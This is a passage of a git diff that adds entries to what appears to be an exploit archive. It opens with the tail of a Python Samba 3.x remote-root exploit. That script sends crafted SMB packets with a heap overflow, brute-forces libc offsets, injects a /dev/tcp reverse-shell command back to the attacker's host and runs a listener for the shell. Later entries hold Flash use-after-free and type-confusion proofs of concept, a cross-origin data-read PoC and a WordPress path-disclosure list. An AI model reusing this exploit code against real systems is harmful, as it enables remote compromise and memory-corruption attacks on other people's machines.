+		"00000000000000000000000001001d14" + \
+		"640000000eff000000babe00000000ff" + \
+		"0000000800b0100000b0103f00000000" + \
+		"00b0100500000110000000b010000001" + \
+		"0000009810000000000800",
+
+	'final_chunk': \
+		"000009a3ff534d422f00000000180000" + \
+		"00000000000000000000000001001d14" + \
+		"640000000eff000000babe00000000ff" + \
+		"00000008006409000064093f00000000" + \
+		"00640905000002100000006409000001" + \
+		"0000004c09000000000800"
+}
+
+
+def exploit(host, port, cbhost, cbport, target):
+	global sploitshake, pwnsauce
+
+	chunk_size = 4248
+
+	target_tcp = (host, port)
+
+	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+	s.connect(target_tcp)
+
+	n = 0
+	for pkt in sploitshake:
+		s.send(unhexlify(pkt))
+		pkt_res = s.recv(rs)
+		n = n+1
+
+	fid = hexlify(pkt_res[0x2a] + pkt_res[0x2b])
+
+	s.send(unhexlify(pwnsauce['smb_bind'].replace("babe", fid)))
+	pkt_res = s.recv(rs)
+
+	buf = "X"*20  # policy handle
+	level = 2 #LSA_POLICY_INFO_AUDIT_EVENTS
+	buf+=struct.pack('<H',level) # level
+	buf+=struct.pack('<H',level)# level2
+	buf+=struct.pack('<L',1)#auditing_mode
+	buf+=struct.pack('<L',1)#ptr
+	buf+=struct.pack('<L',100000) # r->count
+	buf+=struct.pack('<L',20) # array_size
+	buf+=struct.pack('<L',0)
+	buf+=struct.pack('<L',100)
+
+	buf += ("A" * target['chunk_offset'])
+
+	buf+=struct.pack("I", 0);
+	buf+=struct.pack("I", target['system_libc_offset']);
+	buf+=struct.pack("I", 0);
+	buf+=struct.pack("I", target['system_libc_offset']);
+	buf+=struct.pack("I", 0xe8150c70);
+	buf+="AAAABBBB"
+
+	cmd = ";;;;/bin/bash -c '/bin/bash 0</dev/tcp/"+cbhost+"/"+cbport+" 1>&0 2>&0' &\x00"
+
+	tmp = cmd*(816/len(cmd))
+	tmp += "\x00"*(816-len(tmp))
+
+	buf+=tmp
+	buf+="A"*(37192-target['chunk_offset'])
+	buf+='z'*(100000 - (28000 + 10000))
+
+	buf_chunks = [buf[x:x+chunk_size] for x in xrange(0, len(buf), chunk_size)]
+	n=0
+
+	for chunk in buf_chunks:
+		if len(chunk) != chunk_size:
+			#print "LAST CHUNK #%d" % n
+			bb = unhexlify(pwnsauce['final_chunk'].replace("babe", fid)) + chunk
+			s.send(bb)
+		else:
+			#print "CHUNK #%d" % n
+			bb = unhexlify(pwnsauce['data_chunk'].replace("babe", fid)) + chunk
+			s.send(bb)
+			retbuf = s.recv(rs)
+		n=n+1
+
+	s.close()
+
+class connectback_shell(SocketServer.BaseRequestHandler):
+	def handle(self):
+		global do_brute
+
+		print "\n[!] connectback shell from %s" % self.client_address[0]
+		do_brute = False
+
+		s = self.request
+
+		import termios, tty, select, os
+		old_settings = termios.tcgetattr(0)
+		try:
+			tty.setcbreak(0)
+			c = True
+			while c:
+				for i in select.select([0, s.fileno()], [], [], 0)[0]:
+					c = os.read(i, 1024)
+					if c:
+						if i == 0:
+							os.write(1, c)
+
+						os.write(s.fileno() if i == 0 else 1, c)
+		except KeyboardInterrupt: pass
+		finally: termios.tcsetattr(0, termios.TCSADRAIN, old_settings)
+
+		return
+		
+
+class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
+	pass
+
+
+if len(sys.argv) != 6:
+	print "\n  {*} samba 3.x remote root by kd(eax)@ireleaseyourohdayfuckyou {*}\n"
+	print "  usage: %s <targethost> <targetport> <myip> <myport> <target>\n" % (sys.argv[0])
+	print "  targets:"
+	i = 0
+	for target in targets:
+		print "    %02d) %s" % (i, target['name'])
+		i = i+1
+
+	print ""
+	sys.exit(-1)
+
+
+target = targets[int(sys.argv[5])]
+
+server = ThreadedTCPServer((sys.argv[3], int(sys.argv[4])), connectback_shell)
+server_thread = threading.Thread(target=server.serve_forever)
+server_thread.daemon = True
+server_thread.start()
+
+while do_brute == True:
+	sys.stdout.write("\r{+} TRYING EIP=\x1b[31m0x%08x\x1b[0m OFFSET=\x1b[32m0x%08x\x1b[0m" % (target['system_libc_offset'], target['chunk_offset']))
+	sys.stdout.flush()
+	exploit(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], target)
+
+	if "finder" in target:
+		target['chunk_offset'] += 4
+	else:
+		target['system_libc_offset'] += 0x1000
+
+
+if "finder" in target:
+	print \
+		"{!} found \x1b[32mNEW\x1b[0m target: chunk_offset = ~%d, " \
+		"system_libc_offset = 0x%03x" % \
+		(target['chunk_offset'], target['system_libc_offset'] & 0xff000fff)
+
+while 1:
+	time.sleep(999)
+
+server.shutdown()
diff --git a/platforms/multiple/dos/37850.txt b/platforms/multiple/dos/37850.txt
new file mode 100755
index 000000000..ae3754e28
--- /dev/null
+++ b/platforms/multiple/dos/37850.txt
@@ -0,0 +1,33 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=352&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+If the fpadInfo property of a NetConnection object is a SharedObject, a use-after-free occurs when the property is deleted. A proof-of-concept is as follows:
+
+var s = SharedObject.getLocal("test");
+
+ASSetPropFlags(s, null, 0, 0xff);
+ASSetPropFlags(s.data, null, 0, 0xff);
+var q = {myprop  :"natalie", myprop2 : "test"};
+s.data.fpadInfo = q;
+s.flush();
+var n = new NetConnection();
+ASnative(2100, 200)(s.data);
+n.connect.call(s.data, "");
+trace(s.data.fpadInfo);
+s = 1;
+
+//GC happens here
+
+setInterval(f, 1000);
+
+function f(){
+
+	ASnative(252, 1).call(q); //Array push
+	delete q.myprop;
+	
+	}
+
+A fla, an AS file and two swfs are attached. shareddelete.fla compiles to shareddelete.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and shareddelete.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up. 
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37850.zip
+
diff --git a/platforms/multiple/dos/37852.txt b/platforms/multiple/dos/37852.txt
new file mode 100755
index 000000000..6c027a8fd
--- /dev/null
+++ b/platforms/multiple/dos/37852.txt
@@ -0,0 +1,35 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=355&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+In certain cases where a native AS2 class sets an internal variable, it can lead to a use-after-free if the variable is a SharedObject. While this example shows setting NetConnection.contentType, this applies to several other variables including many proprties of the Sound and NetStream classes.
+
+A proof of concept is as follows:
+
+var s = SharedObject.getLocal("test");
+ASSetPropFlags(s, null, 0, 0xff);
+ASSetPropFlags(s.data, null, 0, 0xff);
+var o = {myprop: "test", myprop2: "test"};
+s.data.contentType = o;
+flush();
+ASnative(2100, 200)(s.data); // new NetConnection
+trace(s.data.contentType);
+s = 1;
+
+//Do GC
+
+for(var i = 0; i < 100; i++){
+	
+	var b = new flash.display.BitmapData(100, 1000, true, 1000);
+	
+	}
+
+setInterval(c, 1000);
+function c(){
+	ASnative(252, 1).call(o); //Array push
+
+}
+
+A fla, an AS file and two swfs are attached. donotdelete.fla compiles to donotdelete.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and donotdelete.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up. 
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37852.zip
+
diff --git a/platforms/multiple/dos/37855.txt b/platforms/multiple/dos/37855.txt
new file mode 100755
index 000000000..ff9005d7e
--- /dev/null
+++ b/platforms/multiple/dos/37855.txt
@@ -0,0 +1,42 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=360&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+In certain cases where a native AS2 class sets an internal atom to a value, it can lead to a use-after-free if the variable is a SharedObject. While this example shows setting NetConnection.uri, this issue occurs in several other 
+
+A proof of concept is as follows:
+
+var s = SharedObject.getLocal("test");
+
+ASSetPropFlags(s, null, 0, 0xff);
+ASSetPropFlags(s.data, null, 0, 0xff);
+var q = {myprop  :"natalie", myprop2 : "test"};
+var n = new NetConnection();
+
+s.data.uri = q;
+trace("uri " + s.data.uri);
+s.flush();
+ASnative(2100, 200)(s.data);
+
+trace("uri " + s.data.uri);
+n.connect.call(s.data, xx);
+trace(s.data.uri);
+s = 1;
+var a = [];
+var c = [];
+for(i = 0; i < 200; i++){
+	
+	var b = new flash.display.BitmapData(1000, 1000, true, 10);
+}
+
+setInterval(f, 1000);
+
+function f(){
+	
+	ASnative(252, 1).call(q); //Array push
+	
+	}
+
+A fla, an AS file and two swfs are attached. slot.fla compiles to setnum.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and slot.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up. 
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37855.zip
+
diff --git a/platforms/multiple/dos/37859.txt b/platforms/multiple/dos/37859.txt
new file mode 100755
index 000000000..f95c7aecc
--- /dev/null
+++ b/platforms/multiple/dos/37859.txt
@@ -0,0 +1,58 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=365&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+If a watch is set on the childNodes object of an XML object, and then the XML object is manipulated in a way that causes its child nodes to be enumerated, the watch will trigger. If the function in the watch deletes all the child nodes, the buffer containing the nodes will be deleted, even though the original function will still access it when it unwinds. This can lead to a childnodes array in ActionScript containing pointers that can be specified by an attacker. A minimal POC is as follows:
+
+var doc:XML = new XML(); 
+var rootNode:XMLNode = doc.createElement("rootNode");  
+var oldest:XMLNode = doc.createElement("oldest"); 
+var middle:XMLNode = doc.createElement("middle"); 
+var youngest:XMLNode = doc.createElement("youngest"); 
+var youngest1:XMLNode = doc.createElement("youngest1"); 
+var youngest2:XMLNode = doc.createElement("youngest2"); 
+var youngest3:XMLNode = doc.createElement("youngest3"); 
+ 
+// add the rootNode as the root of the XML document tree 
+doc.appendChild(rootNode); 
+ 
+// add each of the child nodes as children of rootNode 
+rootNode.appendChild(oldest); 
+rootNode.appendChild(middle); 
+rootNode.appendChild(youngest1);
+rootNode.appendChild(youngest2);
+rootNode.appendChild(youngest3);
+ 
+// create an array and use rootNode to populate it 
+var firstArray:Array = rootNode.childNodes; 
+trace (firstArray.length);
+
+firstArray[0] = "test";
+firstArray.watch("length", f);
+rootNode.appendChild(youngest);
+
+function f(a, b){
+	
+	trace("in f " + a + " " + b + " " + c);
+	if(b == 1){
+	firstArray.unwatch("length");
+	middle.removeNode();
+	oldest.removeNode();
+	youngest1.removeNode();
+	youngest2.removeNode();
+	youngest3.removeNode();
+	youngest.removeNode();
+	}
+	
+	
+	for(var i = 0; i < 100; i++){
+		var b = new flash.display.BitmapData(100, 1000, true, 1000);
+		var c = "aaaaaaaaaaaaa";
+	}
+	
+		trace("end length " + rootNode.childNodes.length);	
+	}
+
+A sample fla and swf are also attached.	
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37859.zip
+
diff --git a/platforms/multiple/dos/37863.txt b/platforms/multiple/dos/37863.txt
new file mode 100755
index 000000000..7775fc34d
--- /dev/null
+++ b/platforms/multiple/dos/37863.txt
@@ -0,0 +1,27 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=380&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+There is a use-after-free issue if the scale9Grid setting is called on an object with a member that then frees display item. This issue occurs for both MovieClips and Buttons, it needs to be fixed in both classes.
+
+A PoC is as follows:
+
+var n = { valueOf : func };
+var o = {x:n, y:0,width:10, height:10}
+
+_global.mc = this
+var newmc:MovieClip = this.createEmptyMovieClip("mymc",1)
+mymc.scale9Grid = o
+
+
+function func() {
+	trace("here");
+	var t = _global.mc.createTextField("test",1,1,1,2,3)
+	t.removeTextField()
+	return 7
+}
+
+
+A sample fla and swf is attached.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37863.zip
+
diff --git a/platforms/multiple/dos/37864.txt b/platforms/multiple/dos/37864.txt
new file mode 100755
index 000000000..68d559111
--- /dev/null
+++ b/platforms/multiple/dos/37864.txt
@@ -0,0 +1,50 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=388&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+There are use-after frees realated to storing a single pointer (this this pointer) in several MovieClip drawing methods, including beginFill, beginBitmapFill, beginGradientFill, linGradientStyle, lineTo, moveTo, curveTo and lineStyle. A proof-of-concept involving bitmapFill is bewlo:
+
+import flash.display.*;
+import flash.geom.*;
+
+var bmpd:BitmapData = new BitmapData(20,20);
+var rect1:Rectangle = new Rectangle(0,0,10,10);
+var rect2:Rectangle = new Rectangle(0, 10, 10, 20);
+var rect3:Rectangle = new Rectangle(10, 0, 20, 10);
+var rect4:Rectangle = new Rectangle(10, 10, 20, 20);
+bmpd.fillRect(rect1, 0xAA0000FF);
+bmpd.fillRect(rect2, 0xAA00FF00);
+bmpd.fillRect(rect3, 0xAAFF0000);
+bmpd.fillRect(rect4, 0xAA999999);
+var thiz = this;
+this.createEmptyMovieClip("bmp_fill_mc", 1);
+with (bmp_fill_mc) {
+	
+	var n = {valueOf: func};
+    matrix = {a:2, b:n, c:0, d:2, tx:0, ty:0}; 
+    //matrix.rotate(Math.PI/8);
+    repeat = true;
+    smoothing = true;
+    beginBitmapFill(bmpd, matrix, repeat, smoothing);
+    moveTo(0, 0);
+    lineTo(0, 60);
+    lineTo(60, 60);
+    lineTo(60, 0);
+    lineTo(0, 0);
+    endFill();
+}
+
+bmp_fill_mc._xscale = 200;
+bmp_fill_mc._yscale = 200;
+
+function func(){
+	
+	var test = thiz.createTextField("test", 1, 1, 1, 10, 10);
+	trace(test);
+	test.removeTextField();
+	return 777;
+	} 
+
+A sample fla and swf are attached.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37864.zip
+
diff --git a/platforms/multiple/dos/37865.txt b/platforms/multiple/dos/37865.txt
new file mode 100755
index 000000000..8a747a314
--- /dev/null
+++ b/platforms/multiple/dos/37865.txt
@@ -0,0 +1,20 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=391&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+There is a use-after-free in attachMovie due to the initObject. If the initObject contains an object that calls a method that deletes the movie clip that is being attached, a use-after-free occurs. A proof-of-concept is as follows:
+
+n = {_quality : {toString : func}};
+function func(){
+	
+	trace("hello");
+	
+	newResetButton.removeMovieClip();
+	return "test";
+	}
+	
+_root.attachMovie("myResetButton","newResetButton",200, n);
+
+A sample fla and swf are attached.
+
+Proof of Concept: 
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37865.zip
+
diff --git a/platforms/multiple/dos/37871.txt b/platforms/multiple/dos/37871.txt
new file mode 100755
index 000000000..c6372a42b
--- /dev/null
+++ b/platforms/multiple/dos/37871.txt
@@ -0,0 +1,25 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=403&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+There is a use-after-free in MovieClip.swapDepths, a POC is as follows:
+
+var clip1 = this.createEmptyMovieClip("clip1", 1);
+var clip2 = this.createEmptyMovieClip("clip2", 2);
+
+var n = {valueOf: func, toString: func};
+
+clip1.swapDepths(n);
+
+function func(){
+	
+	clip1.removeMovieClip();
+	//_root.createEmptyMovieClip("test", 1);
+	
+	trace("here");
+	return "clip2";
+	}
+
+A swf and fla are attached.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37871.zip
+
diff --git a/platforms/multiple/dos/37872.txt b/platforms/multiple/dos/37872.txt
new file mode 100755
index 000000000..06e275a60
--- /dev/null
+++ b/platforms/multiple/dos/37872.txt
@@ -0,0 +1,24 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=404&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+Source file and compiled PoC attached.
+
+Looking at https://github.com/adobe-flash/avmplus/blob/master/core/XMLListObject.cpp:
+
+bool XMLListObject::delUintProperty(uint32_t index)
+...
+if (index >= _length())      [1]
+        {
+            return true;
+        }
+...
+    px->childChanges(core->knodeRemoved, r->atom());  [2]
+...
+    m_children.removeAt(index);   [3]
+
+In [1], the passed in index is validated. In [2], the callback can run actionscript, which might shrink the size of the current XMLList. In [3], the pre-validated index is used but it might now be invalid due to shrinking at [2]. Unfortunately, removeAt() does not behave well in the presence of an out-of-bounds index.
+
+The PoC works by triggering a wild copy in order to demonstrate the crash. But other side-effects are possible such as decrementing the refcount of an out-of-bounds index.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37872.zip
+
diff --git a/platforms/multiple/dos/37873.txt b/platforms/multiple/dos/37873.txt
new file mode 100755
index 000000000..e1625627c
--- /dev/null
+++ b/platforms/multiple/dos/37873.txt
@@ -0,0 +1,25 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=408&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+There is a use-after-free in CreateTextField. If a flash file contains a MovieClip heirarcy, such as:
+
+_root-->l1-->l2-->l3
+
+If createTextField is called on l2 to create l3, and the call makes a call into a function the deletes l2 or l1, a use-after-free occurs. A POC is as follows:
+
+var l1 = this.createEmptyMovieClip("l1", 1);
+var l2 = l1.createEmptyMovieClip("l2", 1);
+ns = {toString: strfunc, valueOf: strfunc};
+var l3 = l2.createTextField(ns, 1, 0, 0, 10, 10);
+
+function strfunc(){
+	
+	l2.removeMovieClip();
+	return "myname";
+	
+	}
+
+A sample SWF and fla are attached.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37873.zip
+
diff --git a/platforms/multiple/dos/37874.txt b/platforms/multiple/dos/37874.txt
new file mode 100755
index 000000000..9358181e2
--- /dev/null
+++ b/platforms/multiple/dos/37874.txt
@@ -0,0 +1,17 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=409&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+There is a type confusion issue in TextRenderer.setAdvancedAntialiasingTable. If the font, insideCutoff or outsideCutoff are set to objects that are not integers, they are still assumed to be integers. A proof-of-concept is below:
+
+var antiAliasEntry_1 = {fontSize:10, insideCutoff:1.61, outsideCutoff:-3.43};
+var antiAliasEntry_2 = {fontSize:"", insideCutoff:0.8, outsideCutoff:-0.8};
+var arialTable:Array = new Array(antiAliasEntry_1, antiAliasEntry_2);
+
+TextRenderer.setAdvancedAntialiasingTable("Arial", "none", "dark", arialTable);
+
+This issue is low-impact because the type-confused objects are read into the font and cutoff values, which cannot be directly retreived from script. It is probably possible to determine the value read by doing hit tests on the text that is rendered (to see how big and clipped it is), but this would be fairly difficult.
+
+A sample SWF and fla are attached, these samples intentionally crash to demonstrate the issue. 
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37874.zip
+
diff --git a/platforms/multiple/dos/37877.txt b/platforms/multiple/dos/37877.txt
new file mode 100755
index 000000000..f38fd79d8
--- /dev/null
+++ b/platforms/multiple/dos/37877.txt
@@ -0,0 +1,24 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=418&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+There is a use-after-free in the TextField gridFitType setter. A PoC is below:
+
+var test = this.createTextField("test", 1, 0, 0, 100, 100);
+var n = {toString : func, valueOf : func};
+test.gridFitType = n;
+
+function func(){
+	
+	test.removeTextField();
+	for(var i = 0; i < 1000; i++){
+		var b = new flash.display.BitmapData(1000, 1000, true, 10);
+		}
+	trace("here");
+	return "natalie";
+	
+	}
+
+A PoC and fla are attached. Some other setters (thickness, tabIndex, etc.) are also impacted by the same UaF condition, additional SWFs are attached.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37877.zip
+
diff --git a/platforms/multiple/dos/37878.txt b/platforms/multiple/dos/37878.txt
new file mode 100755
index 000000000..f47ccf138
--- /dev/null
+++ b/platforms/multiple/dos/37878.txt
@@ -0,0 +1,52 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=422&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+There is a type confusion issue in the TextFormat constructor that is reachable because the FileReference constructor does not verify that the incoming object is of type Object (it only checks that the object is not native backed). The TextFormat constructor first sets a new object to type TextFormat, and then calls into script several times before setting the native backing object. If one of these script calls then calls into the FileReference constructor, the object can be set to type FileReference, and then the native object will be set to the TextFormat, leading to type confusion. A PoC is as follows:
+
+In the main SWF:
+
+var a = new subfr();
+var allTypes:Array = new Array();
+var imageTypes:Object = new Object();
+imageTypes.description = "Images (*.jpg, *.jpeg, *.gif, *.png)";
+imageTypes.extension = "*.jpg; *.jpeg; *.gif; *.png";
+allTypes.push(imageTypes);
+
+var textTypes:Object = new Object();
+textTypes.description = "Text Files (*.txt, *.rtf)";
+textTypes.extension = "*.txt;*.rtf";
+allTypes.push(textTypes);
+var f = new flash.net.FileReference();
+f.cancel.call(a);
+
+Defining subfr:
+
+class subfr extends Object{
+
+
+	public function subfr(){			
+	var n = {valueOf : func};
+    this.valueOf = func;
+	this.toString = func;
+	this.__proto__ = {}; 
+	this.__proto__.__constructor__ = TextFormat;
+	super(this);
+
+}
+
+function func(){
+	
+	this.__proto__ = {}; 
+	this.__proto__.__constructor__ = flash.net.FileReference;
+	super();
+	return "natalie";
+	}
+		
+		
+}
+	
+	
+A sample SWF and fla are attached.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37878.zip
+
diff --git a/platforms/multiple/dos/37882.txt b/platforms/multiple/dos/37882.txt
new file mode 100755
index 000000000..d19db2ea1
--- /dev/null
+++ b/platforms/multiple/dos/37882.txt
@@ -0,0 +1,7 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=443&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+If an mp3 file contains compressed ID3 data that is larger than 0x2aaaaaaa bytes, an integer overflow will occur in allocating the buffer to contain its converted string data, leading to a large copy into a small buffer. A sample fla, swf and mp3 are attached. Put id34.swf and tag.mp3 in the same folder to reproduce the issue. This issue only works on 64 bit platforms.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37882.zip
+
diff --git a/platforms/multiple/remote/37851.txt b/platforms/multiple/remote/37851.txt
new file mode 100755
index 000000000..dca7d324d
--- /dev/null
+++ b/platforms/multiple/remote/37851.txt
@@ -0,0 +1,14 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=354&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+[90-day deadline tracking for https://code.google.com/p/chromium/issues/detail?id=481639]
+
+---
+An instance of ActionScript's Sound class allows for loading and extracting for further processing any kind of external data, not only sound files. Same-origin policy doesn't apply here. Each input byte of raw data, loaded previously from given URL, is encoded by an unspecified function to the same 8 successive sample blocks of output. The sample block consists of 8 bytes (first 4 bytes for left channel and next 4 bytes for right channel). Only 2 bytes from 8 sound blocks (64 bytes) are crucial, the rest 52 bytes are useless. Each byte of input from range 0-255 has corresponding constant unsigned integer value (a result of encoding), so for decoding purposes you can use simply lookup table (cf. source code from BoundlessTunes.as).
+
+1. Put attached file BoundlessTunes.swf on the HTTP server.
+2. Open http://<SERVER_HOSTNAME>/BoundlessTunes.swf?url=<URL> where <URL> is an URL address (e.g. leading to cross-origin resource). A received response will be displayed in alert window.
+---
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37851.zip
+
diff --git a/platforms/php/webapps/37826.txt b/platforms/php/webapps/37826.txt
new file mode 100755
index 000000000..dddbcc3f5
--- /dev/null
+++ b/platforms/php/webapps/37826.txt
@@ -0,0 +1,149 @@
+source: http://www.securityfocus.com/bid/55597/info
+
+WordPress is prone to multiple path-disclosure vulnerabilities.
+
+Remote attackers can exploit these issues to obtain sensitive information that may lead to further attacks.
+
+WordPress 3.4.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/learn/t/wordpress/wp-includes/vars.php
+http://www.example.com/learn/t/wordpress/wp-includes/update.php
+http://www.example.com/learn/t/wordpress/wp-includes/theme.php
+http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/sidebar.php
+http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/header.php
+http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/footer.php
+http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/comments.php
+http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/comments-popup.php
+http://www.example.com/learn/t/wordpress/wp-includes/template-loader.php
+http://www.example.com/learn/t/wordpress/wp-includes/taxonomy.php
+http://www.example.com/learn/t/wordpress/wp-includes/shortcodes.php
+http://www.example.com/learn/t/wordpress/wp-includes/script-loader.php
+http://www.example.com/learn/t/wordpress/wp-includes/rss.php
+http:www.example.com/learn/t/wordpress/wp-includes/rss-functions.php
+http://www.example.com/learn/t/wordpress/wp-includes/registration.php
+http://www.example.com/learn/t/wordpress/wp-includes/registration-functions.php
+http://www.example.com/learn/t/wordpress/wp-includes/post.php
+http://www.example.com/learn/t/wordpress/wp-includes/post-template.php
+http://www.example.com/learn/t/wordpress/wp-includes/nav-menu-template.php
+http://www.example.com/learn/t/wordpress/wp-includes/ms-settings.php
+http://www.example.com/learn/t/wordpress/wp-includes/ms-functions.php
+http://www.example.com/learn/t/wordpress/wp-includes/ms-default-filters.php
+http://www.example.com/learn/t/wordpress/wp-includes/ms-default-constants.php
+http://www.example.com/learn/t/wordpress/wp-includes/media.php
+http://www.example.com/learn/t/wordpress/wp-includes/kses.php
+http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/config.php
+http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php
+http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpell.php
+http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/GoogleSpell.php
+http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/EnchantSpell.php
+http://www.example.com/learn/t/wordpress/wp-includes/general-template.php
+http://www.example.com/learn/t/wordpress/wp-includes/functions.php
+http://www.example.com/learn/t/wordpress/wp-includes/feed-rss2.php
+http://www.example.com/learn/t/wordpress/wp-includes/feed-rss2-comments.php
+http://www.example.com/learn/t/wordpress/wp-includes/feed-rss.php
+http://www.example.com/learn/t/wordpress/wp-includes/feed-rdf.php
+http://www.example.com/learn/t/wordpress/wp-includes/feed-atom.php
+http://www.example.com/learn/t/wordpress/wp-includes/feed-atom-comments.php
+http://www.example.com/learn/t/wordpress/wp-includes/default-widgets.php
+http://www.example.com/learn/t/wordpress/wp-includes/default-filters.php
+http://www.example.com/learn/t/wordpress/wp-includes/comment-template.php
+http://www.example.com/learn/t/wordpress/wp-includes/class.wp-styles.php
+http://www.example.com/learn/t/wordpress/wp-includes/class.wp-scripts.php
+http://www.example.com/learn/t/wordpress/wp-includes/class-wp-xmlrpc-server.php
+http://www.example.com/learn/t/wordpress/wp-includes/class-wp-http-ixr-client.php
+http://www.example.com/learn/t/wordpress/wp-includes/class-snoopy.php
+http://www.example.com/learn/t/wordpress/wp-includes/class-feed.php
+http://www.example.com/learn/t/wordpress/wp-includes/category-template.php
+http://www.example.com/learn/t/wordpress/wp-includes/canonical.php
+http://www.example.com/learn/t/wordpress/wp-includes/author-template.php
+http://www.example.com/learn/t/wordpress/wp-includes/admin-bar.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/tag.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/single.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/sidebar.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/sidebar-footer.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/search.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/page.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/onecolumn-page.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop-single.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop-page.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop-attachment.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/index.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/header.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/functions.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/footer.php
+http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/comments.php
